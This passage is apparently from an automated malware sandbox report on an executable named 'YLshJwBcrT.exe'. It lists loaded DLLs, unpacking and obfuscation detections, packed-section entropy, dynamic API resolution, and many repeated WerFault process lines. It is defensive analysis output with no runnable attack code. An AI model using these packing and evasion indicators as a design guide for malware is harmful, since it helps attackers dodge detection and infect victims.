                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeUnpacked PE file: 0.2.YLshJwBcrT.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.dotej:W;.tls:W;.beciluy:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeUnpacked PE file: 0.2.YLshJwBcrT.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: YLshJwBcrT.exeStatic PE information: section name: .dotej
                    Source: YLshJwBcrT.exeStatic PE information: section name: .beciluy
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0085F102 push eax; ret 0_2_0085F120
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0085F111 push eax; ret 0_2_0085F120
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0085C133 push 7DD07DC0h; iretd 0_2_0085C144
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_0085B62D pushfd ; iretd 0_2_0085B630
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_022FB29C push ecx; ret 0_2_022FB2AF
                    Source: YLshJwBcrT.exeStatic PE information: section name: .text entropy: 7.872518755623235
                    Source: C:\Users\user\Desktop\YLshJwBcrT.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
